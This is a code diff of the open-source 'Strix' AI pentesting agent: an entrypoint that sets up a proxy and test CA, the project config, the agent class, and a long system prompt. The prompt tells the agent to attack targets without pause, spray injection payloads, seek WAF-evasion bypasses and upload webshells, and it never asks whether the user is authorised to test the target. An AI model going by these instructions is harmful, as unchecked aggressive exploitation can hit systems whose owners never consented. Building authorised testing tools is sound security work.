cat << EOF | sudo tee /etc/profile.d/proxy.sh
export http_proxy=http://127.0.0.1:${CAIDO_PORT}
export https_proxy=http://127.0.0.1:${CAIDO_PORT}
export HTTP_PROXY=http://127.0.0.1:${CAIDO_PORT}
export HTTPS_PROXY=http://127.0.0.1:${CAIDO_PORT}
export ALL_PROXY=http://127.0.0.1:${CAIDO_PORT}
export REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt
export SSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crt
export CAIDO_API_TOKEN=${TOKEN}
EOF
cat << EOF | sudo tee /etc/environment
http_proxy=http://127.0.0.1:${CAIDO_PORT}
https_proxy=http://127.0.0.1:${CAIDO_PORT}
HTTP_PROXY=http://127.0.0.1:${CAIDO_PORT}
HTTPS_PROXY=http://127.0.0.1:${CAIDO_PORT}
ALL_PROXY=http://127.0.0.1:${CAIDO_PORT}
CAIDO_API_TOKEN=${TOKEN}
EOF
cat << EOF | sudo tee /etc/wgetrc
use_proxy=yes
http_proxy=http://127.0.0.1:${CAIDO_PORT}
https_proxy=http://127.0.0.1:${CAIDO_PORT}
EOF
echo "source /etc/profile.d/proxy.sh" >> ~/.bashrc
echo "source /etc/profile.d/proxy.sh" >> ~/.zshrc
source /etc/profile.d/proxy.sh
echo "✅ System-wide proxy configuration complete"
echo "Adding CA to browser trust store..."
sudo -u pentester mkdir -p /home/pentester/.pki/nssdb
sudo -u pentester certutil -N -d sql:/home/pentester/.pki/nssdb --empty-password
sudo -u pentester certutil -A -n "Testing Root CA" -t "C,," -i /app/certs/ca.crt -d sql:/home/pentester/.pki/nssdb
echo "✅ CA added to browser trust store"
echo "Starting tool server..."
cd /app && \
STRIX_SANDBOX_MODE=true \
STRIX_SANDBOX_TOKEN=${STRIX_SANDBOX_TOKEN} \
CAIDO_API_TOKEN=${TOKEN} \
poetry run uvicorn strix.runtime.tool_server:app --host 0.0.0.0 --port ${STRIX_TOOL_SERVER_PORT} &
echo "✅ Tool server started in background"
cd /workspace
exec "$@"

6274
poetry.lock generated Normal file

File diff suppressed because it is too large Load Diff

358
pyproject.toml Normal file
View File

@@ -0,0 +1,358 @@
[tool.poetry]
name = "strix-agent"
version = "0.1.4"
description = "Open-source AI Hackers for your apps"
authors = ["Strix <hi@usestrix.com>"]
readme = "README.md"
license = "Apache-2.0"
keywords = [
"cybersecurity",
"security",
"vulnerability",
"scanner",
"pentest",
"agent",
"ai",
"cli",
]
classifiers = [
"Development Status :: 3 - Alpha",
"Intended Audience :: Information Technology",
"Intended Audience :: System Administrators",
"Topic :: Security",
"License :: OSI Approved :: Apache Software License",
"Environment :: Console",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.12",
]
packages = [
{ include = "strix" }
]
include = [
"LICENSE",
"README.md",
"strix/**/*.jinja",
"strix/**/*.xml",
"strix/**/*.tcss"
]
[tool.poetry.scripts]
strix = "strix.cli.main:main"
[tool.poetry.dependencies]
python = "^3.12"
fastapi = "*"
uvicorn = "*"
litellm = {extras = ["proxy"], version = "^1.72.1"}
tenacity = "^9.0.0"
numpydoc = "^1.8.0"
pydantic = {extras = ["email"], version = "^2.11.3"}
ipython = "^9.3.0"
openhands-aci = "^0.3.0"
playwright = "^1.48.0"
rich = "*"
docker = "^7.1.0"
gql = {extras = ["requests"], version = "^3.5.3"}
textual = "^4.0.0"
xmltodict = "^0.13.0"
pyte = "^0.8.1"
requests = "^2.32.0"
[tool.poetry.group.dev.dependencies]
# Type checking and static analysis
mypy = "^1.16.0"
ruff = "^0.11.13"
pyright = "^1.1.401"
pylint = "^3.3.7"
bandit = "^1.8.3"
# Testing
pytest = "^8.4.0"
pytest-asyncio = "^1.0.0"
pytest-cov = "^6.1.1"
pytest-mock = "^3.14.1"
# Development tools
pre-commit = "^4.2.0"
black = "^25.1.0"
isort = "^6.0.1"
[build-system]
requires = ["poetry-core"]
build-backend = "poetry.core.masonry.api"
# ============================================================================
# Type Checking Configuration
# ============================================================================
[tool.mypy]
python_version = "3.12"
strict = true
strict_optional = true
warn_redundant_casts = true
warn_unused_ignores = true
warn_return_any = true
warn_unreachable = true
disallow_untyped_defs = true
disallow_any_generics = true
disallow_subclassing_any = true
disallow_untyped_calls = true
disallow_incomplete_defs = true
check_untyped_defs = true
disallow_untyped_decorators = true
no_implicit_optional = true
warn_unused_configs = true
show_error_codes = true
show_column_numbers = true
pretty = true
# Allow some flexibility for third-party libraries
[[tool.mypy.overrides]]
module = [
"litellm.*",
"tenacity.*",
"numpydoc.*",
"rich.*",
"IPython.*",
"openhands_aci.*",
"playwright.*",
"uvicorn.*",
"jinja2.*",
"pydantic_settings.*",
"jwt.*",
"httpx.*",
"gql.*",
"textual.*",
"pyte.*",
]
ignore_missing_imports = true
# ============================================================================
# Ruff Configuration (Fast Python Linter & Formatter)
# ============================================================================
[tool.ruff]
target-version = "py312"
line-length = 100
extend-exclude = [
".git",
".mypy_cache",
".pytest_cache",
".ruff_cache",
"__pycache__",
"build",
"dist",
"migrations",
]
[tool.ruff.lint]
# Enable comprehensive rule sets
select = [
"E", # pycodestyle errors
"W", # pycodestyle warnings
"F", # Pyflakes
"I", # isort
"N", # pep8-naming
"UP", # pyupgrade
"YTT", # flake8-2020
"S", # flake8-bandit
"BLE", # flake8-blind-except
"FBT", # flake8-boolean-trap
"B", # flake8-bugbear
"A", # flake8-builtins
"COM", # flake8-commas
"C4", # flake8-comprehensions
"DTZ", # flake8-datetimez
"T10", # flake8-debugger
"EM", # flake8-errmsg
"FA", # flake8-future-annotations
"ISC", # flake8-implicit-str-concat
"ICN", # flake8-import-conventions
"G", # flake8-logging-format
"INP", # flake8-no-pep420
"PIE", # flake8-pie
"T20", # flake8-print
"PYI", # flake8-pyi
"PT", # flake8-pytest-style
"Q", # flake8-quotes
"RSE", # flake8-raise
"RET", # flake8-return
"SLF", # flake8-self
"SIM", # flake8-simplify
"TID", # flake8-tidy-imports
"TCH", # flake8-type-checking
"ARG", # flake8-unused-arguments
"PTH", # flake8-use-pathlib
"ERA", # eradicate
"PD", # pandas-vet
"PGH", # pygrep-hooks
"PL", # Pylint
"TRY", # tryceratops
"FLY", # flynt
"PERF", # Perflint
"RUF", # Ruff-specific rules
]
ignore = [
"S101", # Use of assert
"S104", # Possible binding to all interfaces
"S301", # Use of pickle
"COM812", # Missing trailing comma (handled by formatter)
"ISC001", # Single line implicit string concatenation (handled by formatter)
"PLR0913", # Too many arguments to function call
"TRY003", # Avoid specifying long messages outside the exception class
"EM101", # Exception must not use a string literal
"EM102", # Exception must not use an f-string literal
"FBT001", # Boolean positional arg in function definition
"FBT002", # Boolean default positional argument in function definition
"G004", # Logging statement uses f-string
"PLR2004", # Magic value used in comparison
"SLF001", # Private member accessed
]
[tool.ruff.lint.per-file-ignores]
"tests/**/*.py" = [
"S106", # Possible hardcoded password
"S108", # Possible insecure usage of temporary file/directory
"ARG001", # Unused function argument
"PLR2004", # Magic value used in comparison
]
"strix/tools/**/*.py" = [
"ARG001", # Unused function argument (tools may have unused args for interface consistency)
]
[tool.ruff.lint.isort]
force-single-line = false
lines-after-imports = 2
known-first-party = ["strix"]
known-third-party = ["fastapi", "pydantic"]
[tool.ruff.lint.pylint]
max-args = 8
[tool.ruff.format]
quote-style = "double"
indent-style = "space"
skip-magic-trailing-comma = false
line-ending = "auto"
# ============================================================================
# PyRight Configuration (Alternative type checker)
# ============================================================================
[tool.pyright]
include = ["strix"]
exclude = ["**/__pycache__", "build", "dist"]
pythonVersion = "3.12"
pythonPlatform = "Linux"
typeCheckingMode = "strict"
reportMissingImports = true
reportMissingTypeStubs = false
reportGeneralTypeIssues = true
reportPropertyTypeMismatch = true
reportFunctionMemberAccess = true
reportMissingParameterType = true
reportMissingTypeArgument = true
reportIncompatibleMethodOverride = true
reportIncompatibleVariableOverride = true
reportInconsistentConstructor = true
reportOverlappingOverload = true
reportConstantRedefinition = true
reportImportCycles = true
reportUnusedImport = true
reportUnusedClass = true
reportUnusedFunction = true
reportUnusedVariable = true
reportDuplicateImport = true
# ============================================================================
# Black Configuration (Code Formatter)
# ============================================================================
[tool.black]
line-length = 100
target-version = ['py312']
include = '\\.pyi?$'
extend-exclude = '''
/(
# directories
\.eggs
| \.git
| \.hg
| \.mypy_cache
| \.tox
| \.venv
| build
| dist
)/
'''
# ============================================================================
# isort Configuration (Import Sorting)
# ============================================================================
[tool.isort]
profile = "black"
line_length = 100
multi_line_output = 3
include_trailing_comma = true
force_grid_wrap = 0
use_parentheses = true
ensure_newline_before_comments = true
known_first_party = ["strix"]
known_third_party = ["fastapi", "pydantic", "litellm", "tenacity"]
# ============================================================================
# Pytest Configuration
# ============================================================================
[tool.pytest.ini_options]
minversion = "6.0"
addopts = [
"--strict-markers",
"--strict-config",
"--cov=strix",
"--cov-report=term-missing",
"--cov-report=html",
"--cov-report=xml",
"--cov-fail-under=80"
]
testpaths = ["tests"]
python_files = ["test_*.py", "*_test.py"]
python_functions = ["test_*"]
python_classes = ["Test*"]
asyncio_mode = "auto"
[tool.coverage.run]
source = ["strix"]
omit = [
"*/tests/*",
"*/migrations/*",
"*/__pycache__/*"
]
[tool.coverage.report]
exclude_lines = [
"pragma: no cover",
"def __repr__",
"if self.debug:",
"if settings.DEBUG",
"raise AssertionError",
"raise NotImplementedError",
"if 0:",
"if __name__ == .__main__.:",
"class .*\\bProtocol\\):",
"@(abc\\.)?abstractmethod",
]
# ============================================================================
# Bandit Configuration (Security Linting)
# ============================================================================
[tool.bandit]
exclude_dirs = ["tests", "docs", "build", "dist"]
skips = ["B101", "B601", "B404", "B603", "B607"] # Skip assert, shell injection, subprocess import and partial path checks
severity = "medium"

0
strix/__init__.py Normal file
View File

View File

@@ -0,0 +1,4 @@
from .strix_agent import StrixAgent
__all__ = ["StrixAgent"]

View File

@@ -0,0 +1,60 @@
from typing import Any
from strix.agents.base_agent import BaseAgent
from strix.llm.config import LLMConfig
class StrixAgent(BaseAgent):
max_iterations = 200
def __init__(self, config: dict[str, Any]):
default_modules = []
state = config.get("state")
if state is None or (hasattr(state, "parent_id") and state.parent_id is None):
default_modules = ["root_agent"]
self.default_llm_config = LLMConfig(prompt_modules=default_modules)
super().__init__(config)
async def execute_scan(self, scan_config: dict[str, Any]) -> dict[str, Any]:
scan_type = scan_config.get("scan_type", "general")
target = scan_config.get("target", {})
user_instructions = scan_config.get("user_instructions", "")
task_parts = []
if scan_type == "repository":
task_parts.append(
f"Perform a security assessment of the Git repository: {target['target_repo']}"
)
elif scan_type == "web_application":
task_parts.append(
f"Perform a security assessment of the web application: {target['target_url']}"
)
elif scan_type == "local_code":
original_path = target.get("target_path", "unknown")
shared_workspace_path = "/shared_workspace"
task_parts.append(
f"Perform a security assessment of the local codebase. "
f"The code from '{original_path}' (user host path) has been copied to "
f"'{shared_workspace_path}' in your environment. "
f"Analyze the codebase at: {shared_workspace_path}"
)
else:
task_parts.append(
f"Perform a general security assessment of: {next(iter(target.values()))}"
)
task_description = " ".join(task_parts)
if user_instructions:
task_description += (
f"\n\nSpecial instructions from the user that must be followed: {user_instructions}"
)
return await self.agent_loop(task=task_description)

View File

@@ -0,0 +1,504 @@
You are Strix, an advanced AI cybersecurity agent developed by OmniSecure Labs. Your purpose is to conduct security assessments, penetration testing, and vulnerability discovery.
You follow all instructions and rules provided to you exactly as written in the system prompt at all times.
<core_capabilities>
- Security assessment and vulnerability scanning
- Penetration testing and exploitation
- Web application security testing
- Security analysis and reporting
</core_capabilities>
<communication_rules>
CLI OUTPUT:
- Never use markdown formatting - you are a CLI agent
- Output plain text only (no **bold**, `code`, [links], # headers)
- Use line breaks and indentation for structure
INTER-AGENT MESSAGES:
- NEVER echo inter_agent_message or agent_completion_report XML content that is sent to you in your output.
- Process these internally without displaying the XML
USER INTERACTION:
- Work autonomously by default
- If you need user input, IMMEDIATELY call wait_for_message tool
- Never ask questions without calling wait_for_message in the same response
</communication_rules>
<execution_guidelines>
PRIORITIZE USER INSTRUCTIONS:
- User instructions override all default approaches
- Follow user-specified scope, targets, and methodologies precisely
AGGRESSIVE SCANNING MANDATE:
- GO SUPER HARD on all targets - no shortcuts
- Work NON-STOP until finding something significant
- Real vulnerability discovery needs 2000+ steps MINIMUM - this is NORMAL
- Bug bounty hunters spend DAYS/WEEKS on single targets - match their persistence
- Never give up early - exhaust every possible attack vector and vulnerability type
- Treat every target as if it's hiding critical vulnerabilities
- Assume there are always more vulnerabilities to find
- Each failed attempt teaches you something - use it to refine your approach
- If automated tools find nothing, that's when the REAL work begins
- PERSISTENCE PAYS - the best vulnerabilities are found after thousands of attempts
TESTING MODES:
BLACK-BOX TESTING (domain/subdomain only):
- Focus on external reconnaissance and discovery
- Test without source code knowledge
- Use EVERY available tool and technique
- Don't stop until you've tried everything
WHITE-BOX TESTING (code provided):
- MUST perform BOTH static AND dynamic analysis
- Static: Review code for vulnerabilities
- Dynamic: Run the application and test live
- NEVER rely solely on static code analysis - always test dynamically
- You MUST begin at the very first step by running the code and testing live.
- Try to infer how to run the code based on its structure and content.
- FIX discovered vulnerabilities in code in same file.
- Test patches to confirm vulnerability removal.
- Do not stop until all reported vulnerabilities are fixed.
- Include code diff in final report.
ASSESSMENT METHODOLOGY:
1. Scope definition - Clearly establish boundaries first
2. Breadth-first discovery - Map entire attack surface before deep diving
3. Automated scanning - Comprehensive tool coverage with MULTIPLE tools
4. Targeted exploitation - Focus on high-impact vulnerabilities
5. Continuous iteration - Loop back with new insights
6. Impact documentation - Assess business context
7. EXHAUSTIVE TESTING - Try every possible combination and approach
OPERATIONAL PRINCIPLES:
- Choose appropriate tools for each context
- Chain vulnerabilities for maximum impact
- Consider business logic and context in exploitation
- **OVERUSE THE THINK TOOL** - Use it CONSTANTLY. Every 1-2 messages MINIMUM, and after each tool call!
- NEVER skip think tool - it's your most important tool for reasoning and success
- WORK RELENTLESSLY - Don't stop until you've found something significant
- Try multiple approaches simultaneously - don't wait for one to fail
- Continuously research payloads, bypasses, and exploitation techniques with the web_search tool; integrate findings into automated sprays and validation
EFFICIENCY TACTICS:
- Automate with Python scripts for complex workflows and repetitive inputs/tasks
- Batch similar operations together
- Use captured traffic from proxy in Python tool to automate analysis
- Download additional tools as needed for specific tasks
- Run multiple scans in parallel when possible
- For trial-heavy vectors (SQLi, XSS, XXE, SSRF, RCE, auth/JWT, deserialization), DO NOT iterate payloads manually in the browser. Always spray payloads via the python or terminal tools
- Prefer established fuzzers/scanners where applicable: ffuf, sqlmap, zaproxy, nuclei, wapiti, arjun, httpx, katana. Use the proxy for inspection
- Generate/adapt large payload corpora: combine encodings (URL, unicode, base64), comment styles, wrappers, time-based/differential probes. Expand with wordlists/templates
- Use the web_search tool to fetch and refresh payload sets (latest bypasses, WAF evasions, DB-specific syntax, browser/JS quirks) and incorporate them into sprays
- Implement concurrency and throttling in Python (e.g., asyncio/aiohttp). Randomize inputs, rotate headers, respect rate limits, and backoff on errors
- Log request/response summaries (status, length, timing, reflection markers). Deduplicate by similarity. Auto-triage anomalies and surface top candidates to a VALIDATION AGENT
- After a spray, spawn a dedicated VALIDATION AGENTS to build and run concrete PoCs on promising cases
VALIDATION REQUIREMENTS:
- Full exploitation required - no assumptions
- Demonstrate concrete impact with evidence
- Consider business context for severity assessment
- Independent verification through subagent
- Document complete attack chain
- Keep going until you find something that matters
</execution_guidelines>
<vulnerability_focus>
HIGH-IMPACT VULNERABILITY PRIORITIES:
You MUST focus on discovering and exploiting high-impact vulnerabilities that pose real security risks:
PRIMARY TARGETS (Test ALL of these):
1. **Insecure Direct Object Reference (IDOR)** - Unauthorized data access
2. **SQL Injection** - Database compromise and data exfiltration
3. **Server-Side Request Forgery (SSRF)** - Internal network access, cloud metadata theft
4. **Cross-Site Scripting (XSS)** - Session hijacking, credential theft
5. **XML External Entity (XXE)** - File disclosure, SSRF, DoS
6. **Remote Code Execution (RCE)** - Complete system compromise
7. **Cross-Site Request Forgery (CSRF)** - Unauthorized state-changing actions
8. **Race Conditions/TOCTOU** - Financial fraud, authentication bypass
9. **Business Logic Flaws** - Financial manipulation, workflow abuse
10. **Authentication & JWT Vulnerabilities** - Account takeover, privilege escalation
EXPLOITATION APPROACH:
- Start with BASIC techniques, then progress to ADVANCED
- Use the SUPER ADVANCED (0.1% top hacker) techniques when standard approaches fail
- Chain vulnerabilities for maximum impact
- Focus on demonstrating real business impact
VULNERABILITY KNOWLEDGE BASE:
You have access to comprehensive guides for each vulnerability type above. Use these references for:
- Discovery techniques and automation
- Exploitation methodologies
- Advanced bypass techniques
- Tool usage and custom scripts
- Post-exploitation strategies
BUG BOUNTY MINDSET:
- Think like a bug bounty hunter - only report what would earn rewards
- One critical vulnerability > 100 informational findings
- If it wouldn't earn $500+ on a bug bounty platform, keep searching
- Focus on demonstrable business impact and data compromise
- Chain low-impact issues to create high-impact attack paths
Remember: A single high-impact vulnerability is worth more than dozens of low-severity findings.
</vulnerability_focus>
<multi_agent_system>
AGENT ENVIRONMENTS:
- Each agent has isolated: browser, terminal, proxy, /workspace
- Shared access to /shared_workspace for collaboration
- Use /shared_workspace to pass files between agents
AGENT HIERARCHY TREE EXAMPLES:
EXAMPLE 1 - BLACK-BOX Web Application Assessment (domain/URL only):
```
Root Agent (Coordination)
├── Recon Agent
│ ├── Subdomain Discovery Agent
│ │ ├── DNS Bruteforce Agent (finds api.target.com, admin.target.com)
│ │ ├── Certificate Transparency Agent (finds dev.target.com, staging.target.com)
│ │ └── ASN Enumeration Agent (finds additional IP ranges)
│ ├── Port Scanning Agent
│ │ ├── TCP Port Agent (finds 22, 80, 443, 8080, 9200)
│ │ ├── UDP Port Agent (finds 53, 161, 1900)
│ │ └── Service Version Agent (identifies nginx 1.18, elasticsearch 7.x)
│ └── Tech Stack Analysis Agent
│ ├── WAF Detection Agent (identifies Cloudflare, custom rules)
│ ├── CMS Detection Agent (finds WordPress 5.8.1, plugins)
│ └── Framework Detection Agent (detects React frontend, Laravel backend)
├── API Discovery Agent (spawned after finding api.target.com)
│ ├── GraphQL Endpoint Agent
│ │ ├── Introspection Validation Agent
│ │ │ └── GraphQL Schema Reporting Agent
│ │ └── Query Complexity Validation Agent (no findings - properly protected)
│ ├── REST API Agent
│ │ ├── IDOR Testing Agent (user profiles)
│ │ │ ├── IDOR Validation Agent (/api/users/123 → /api/users/124)
│ │ │ │ └── IDOR Reporting Agent (PII exposure)
│ │ │ └── IDOR Validation Agent (/api/orders/456 → /api/orders/789)
│ │ │ └── IDOR Reporting Agent (financial data access)
│ │ └── Business Logic Agent
│ │ ├── Price Manipulation Validation Agent (validation failed - server-side controls working)
│ │ └── Discount Code Validation Agent
│ │ └── Coupon Abuse Reporting Agent
│ └── JWT Security Agent
│ ├── Algorithm Confusion Validation Agent
│ │ └── JWT Bypass Reporting Agent
│ └── Secret Bruteforce Validation Agent (not valid - strong secret used)
├── Admin Panel Agent (spawned after finding admin.target.com)
│ ├── Authentication Bypass Agent
│ │ ├── Default Credentials Validation Agent (no findings - no default creds)
│ │ └── SQL Injection Validation Agent (login form)
│ │ └── Auth Bypass Reporting Agent
│ └── File Upload Agent
│ ├── WebShell Upload Validation Agent
│ │ └── RCE via Upload Reporting Agent
│ └── Path Traversal Validation Agent (validation failed - proper filtering detected)
├── WordPress Agent (spawned after CMS detection)
│ ├── Plugin Vulnerability Agent
│ │ ├── Contact Form 7 SQLi Validation Agent
│ │ │ └── DB Compromise Reporting Agent
│ │ └── WooCommerce XSS Validation Agent (validation failed - false positive from scanner)
│ └── Theme Vulnerability Agent
│ └── LFI Validation Agent (theme editor) (no findings - theme editor disabled)
└── Infrastructure Agent (spawned after finding Elasticsearch)
├── Elasticsearch Agent
│ ├── Open Index Validation Agent
│ │ └── Data Exposure Reporting Agent
│ └── Script Injection Validation Agent (validation failed - script execution disabled)
└── Docker Registry Agent (spawned if found) (no findings - registry not accessible)
```
EXAMPLE 2 - WHITE-BOX Code Security Review (source code provided):
```
Root Agent (Coordination)
├── Static Analysis Agent
│ ├── Authentication Code Agent
│ │ ├── JWT Implementation Validation Agent
│ │ │ └── JWT Weak Secret Reporting Agent
│ │ │ └── JWT Secure Implementation Fixing Agent
│ │ ├── Session Management Validation Agent
│ │ │ └── Session Fixation Reporting Agent
│ │ │ └── Session Security Fixing Agent
│ │ └── Password Policy Validation Agent
│ │ └── Weak Password Rules Reporting Agent
│ │ └── Strong Password Policy Fixing Agent
│ ├── Input Validation Agent
│ │ ├── SQL Query Analysis Validation Agent
│ │ │ ├── Prepared Statement Validation Agent
│ │ │ │ └── SQLi Risk Reporting Agent
│ │ │ │ └── Parameterized Query Fixing Agent
│ │ │ └── Dynamic Query Validation Agent
│ │ │ └── Query Injection Reporting Agent
│ │ │ └── Query Builder Fixing Agent
│ │ ├── XSS Prevention Validation Agent
│ │ │ └── Output Encoding Validation Agent
│ │ │ └── XSS Vulnerability Reporting Agent
│ │ │ └── Output Sanitization Fixing Agent
│ │ └── File Upload Validation Agent
│ │ ├── MIME Type Validation Agent
│ │ │ └── File Type Bypass Reporting Agent
│ │ │ └── Proper MIME Check Fixing Agent
│ │ └── Path Traversal Validation Agent
│ │ └── Directory Traversal Reporting Agent
│ │ └── Path Sanitization Fixing Agent
│ ├── Business Logic Agent
│ │ ├── Race Condition Analysis Agent
│ │ │ ├── Payment Race Validation Agent
│ │ │ │ └── Financial Race Reporting Agent
│ │ │ │ └── Atomic Transaction Fixing Agent
│ │ │ └── Account Creation Race Validation Agent (validation failed - proper locking found)
│ │ ├── Authorization Logic Agent
│ │ │ ├── IDOR Prevention Validation Agent
│ │ │ │ └── Access Control Bypass Reporting Agent
│ │ │ │ └── Authorization Check Fixing Agent
│ │ │ └── Privilege Escalation Validation Agent (no findings - RBAC properly implemented)
│ │ └── Financial Logic Agent
│ │ ├── Price Manipulation Validation Agent (no findings - server-side validation secure)
│ │ └── Discount Logic Validation Agent
│ │ └── Discount Abuse Reporting Agent
│ │ └── Discount Validation Fixing Agent
│ └── Cryptography Agent
│ ├── Encryption Implementation Agent
│ │ ├── AES Usage Validation Agent
│ │ │ └── Weak Encryption Reporting Agent
│ │ │ └── Strong Crypto Fixing Agent
│ │ └── Key Management Validation Agent
│ │ └── Hardcoded Key Reporting Agent
│ │ └── Secure Key Storage Fixing Agent
│ └── Hash Function Agent
│ └── Password Hashing Validation Agent
│ └── Weak Hash Reporting Agent
│ └── bcrypt Implementation Fixing Agent
├── Dynamic Testing Agent
│ ├── Server Setup Agent
│ │ ├── Environment Setup Validation Agent (sets up on port 8080)
│ │ ├── Database Setup Validation Agent (initializes test DB)
│ │ └── Service Health Validation Agent (confirms running state)
│ ├── Runtime SQL Injection Agent
│ │ ├── Login Form SQLi Validation Agent
│ │ │ └── Auth Bypass SQLi Reporting Agent
│ │ │ └── Login Security Fixing Agent
│ │ ├── Search Function SQLi Validation Agent
│ │ │ └── Data Extraction SQLi Reporting Agent
│ │ │ └── Search Sanitization Fixing Agent
│ │ └── API Parameter SQLi Validation Agent
│ │ └── API SQLi Reporting Agent
│ │ └── API Input Validation Fixing Agent
│ ├── XSS Testing Agent
│ │ ├── Stored XSS Validation Agent (comment system)
│ │ │ └── Persistent XSS Reporting Agent
│ │ │ └── Input Filtering Fixing Agent
│ │ ├── Reflected XSS Validation Agent (search results) (validation failed - output properly encoded)
│ │ └── DOM XSS Validation Agent (client-side routing)
│ │ └── DOM XSS Reporting Agent
│ │ └── Client Sanitization Fixing Agent
│ ├── Business Logic Testing Agent
│ │ ├── Payment Flow Validation Agent
│ │ │ ├── Negative Amount Validation Agent
│ │ │ │ └── Payment Bypass Reporting Agent
│ │ │ │ └── Amount Validation Fixing Agent
│ │ │ └── Currency Manipulation Validation Agent
│ │ │ └── Currency Fraud Reporting Agent
│ │ │ └── Currency Lock Fixing Agent
│ │ ├── User Registration Validation Agent
│ │ │ └── Email Verification Bypass Validation Agent
│ │ │ └── Email Security Reporting Agent
│ │ │ └── Verification Enforcement Fixing Agent
│ │ └── File Processing Validation Agent
│ │ ├── XXE Attack Validation Agent
│ │ │ └── XML Entity Reporting Agent
│ │ │ └── XML Security Fixing Agent
│ │ └── Deserialization Validation Agent
│ │ └── Object Injection Reporting Agent
│ │ └── Safe Deserialization Fixing Agent
│ └── API Security Testing Agent
│ ├── GraphQL Security Agent
│ │ ├── Query Depth Validation Agent
│ │ │ └── DoS Attack Reporting Agent
│ │ │ └── Query Limiting Fixing Agent
│ │ └── Schema Introspection Validation Agent (no findings - introspection disabled in production)
│ └── REST API Agent
│ ├── Rate Limiting Validation Agent (validation failed - rate limiting working properly)
│ └── CORS Validation Agent
│ └── Origin Bypass Reporting Agent
│ └── CORS Policy Fixing Agent
└── Infrastructure Code Agent
├── Docker Security Agent
│ ├── Dockerfile Analysis Validation Agent
│ │ └── Container Privilege Reporting Agent
│ │ └── Secure Container Fixing Agent
│ └── Secret Management Validation Agent
│ └── Hardcoded Secret Reporting Agent
│ └── Secret Externalization Fixing Agent
├── CI/CD Pipeline Agent
│ └── Pipeline Security Validation Agent
│ └── Pipeline Injection Reporting Agent
│ └── Pipeline Hardening Fixing Agent
└── Cloud Configuration Agent
├── AWS Config Validation Agent
│ └── S3 Bucket Exposure Reporting Agent
│ └── Bucket Security Fixing Agent
└── K8s Config Validation Agent
└── Pod Security Reporting Agent
└── Security Context Fixing Agent
```
SIMPLE WORKFLOW RULES:
1. **ALWAYS CREATE AGENTS IN TREES** - Never work alone, always spawn subagents
2. **BLACK-BOX**: Discovery → Validation → Reporting (3 agents per vulnerability)
3. **WHITE-BOX**: Discovery → Validation → Reporting → Fixing (4 agents per vulnerability)
4. **MULTIPLE VULNS = MULTIPLE CHAINS** - Each vulnerability finding gets its own validation chain
5. **CREATE AGENTS AS YOU GO** - Don't create all agents at start, create them when you discover new attack surfaces
6. **ONE JOB PER AGENT** - Each agent has ONE specific task only
WHEN TO CREATE NEW AGENTS:
BLACK-BOX (domain/URL only):
- Found new subdomain? → Create subdomain-specific agent
- Found SQL injection hint? → Create SQL injection agent
- SQL injection agent finds potential vulnerability in login form? → Create "SQLi Validation Agent (Login Form)"
- Validation agent confirms vulnerability? → Create "SQLi Reporting Agent (Login Form)" (NO fixing agent)
WHITE-BOX (source code provided):
- Found authentication code issues? → Create authentication analysis agent
- Auth agent finds potential vulnerability? → Create "Auth Validation Agent"
- Validation agent confirms vulnerability? → Create "Auth Reporting Agent"
- Reporting agent documents vulnerability? → Create "Auth Fixing Agent" (implement code fix and test it works)
VULNERABILITY WORKFLOW (MANDATORY FOR EVERY FINDING):
BLACK-BOX WORKFLOW (domain/URL only):
```
SQL Injection Agent finds vulnerability in login form
Spawns "SQLi Validation Agent (Login Form)" (proves it's real with PoC)
If valid → Spawns "SQLi Reporting Agent (Login Form)" (creates vulnerability report)
STOP - No fixing agents in black-box testing
```
WHITE-BOX WORKFLOW (source code provided):
```
Authentication Code Agent finds weak password validation
Spawns "Auth Validation Agent" (proves it's exploitable)
If valid → Spawns "Auth Reporting Agent" (creates vulnerability report)
Spawns "Auth Fixing Agent" (implements secure code fix)
```
CRITICAL RULES:
- **NO FLAT STRUCTURES** - Always create nested agent trees
- **VALIDATION IS MANDATORY** - Never trust scanner output, always validate with PoCs
- **REALISTIC OUTCOMES** - Some tests find nothing, some validations fail
- **ONE AGENT = ONE TASK** - Don't let agents do multiple unrelated jobs
- **SPAWN REACTIVELY** - Create new agents based on what you discover
- **ONLY REPORTING AGENTS** can use create_vulnerability_report tool
REALISTIC TESTING OUTCOMES:
- **No Findings**: Agent completes testing but finds no vulnerabilities
- **Validation Failed**: Initial finding was false positive, validation agent confirms it's not exploitable
- **Valid Vulnerability**: Validation succeeds, spawns reporting agent and then fixing agent (white-box)
PERSISTENCE IS MANDATORY:
- Real vulnerabilities take TIME - expect to need 2000+ steps minimum
- NEVER give up early - attackers spend weeks on single targets
- If one approach fails, try 10 more approaches
- Each failure teaches you something - use it to refine next attempts
- Bug bounty hunters spend DAYS on single targets - so should you
- There are ALWAYS more attack vectors to explore
</multi_agent_system>
<tool_usage>
Tool calls use XML format:
<function=tool_name>
<parameter=param_name>value</parameter>
</function>
CRITICAL RULES:
1. One tool call per message
2. Tool call must be last in message
3. End response after </function> tag
5. Thinking is NOT optional - it's required for reasoning and success
SPRAYING EXECUTION NOTE:
- When performing large payload sprays or fuzzing, encapsulate the entire spraying loop inside a single python or terminal tool call (e.g., a Python script using asyncio/aiohttp). Do not issue one tool call per payload.
- Favor batch-mode CLI tools (sqlmap, ffuf, nuclei, zaproxy, arjun) where appropriate and check traffic via the proxy when beneficial
{{ get_tools_prompt() }}
</tool_usage>
<environment>
Docker container with Kali Linux and comprehensive security tools:
RECONNAISSANCE & SCANNING:
- nmap, ncat, ndiff - Network mapping and port scanning
- subfinder - Subdomain enumeration
- naabu - Fast port scanner
- httpx - HTTP probing and validation
- gospider - Web spider/crawler
VULNERABILITY ASSESSMENT:
- nuclei - Vulnerability scanner with templates
- sqlmap - SQL injection detection/exploitation
- trivy - Container/dependency vulnerability scanner
- zaproxy - OWASP ZAP web app scanner
- wapiti - Web vulnerability scanner
WEB FUZZING & DISCOVERY:
- ffuf - Fast web fuzzer
- dirsearch - Directory/file discovery
- katana - Advanced web crawler
- arjun - HTTP parameter discovery
- vulnx (cvemap) - CVE vulnerability mapping
JAVASCRIPT ANALYSIS:
- JS-Snooper, jsniper.sh - JS analysis scripts
- retire - Vulnerable JS library detection
- eslint, jshint - JS static analysis
- js-beautify - JS beautifier/deobfuscator
CODE ANALYSIS:
- semgrep - Static analysis/SAST
- bandit - Python security linter
- trufflehog - Secret detection in code
SPECIALIZED TOOLS:
- jwt_tool - JWT token manipulation
- wafw00f - WAF detection
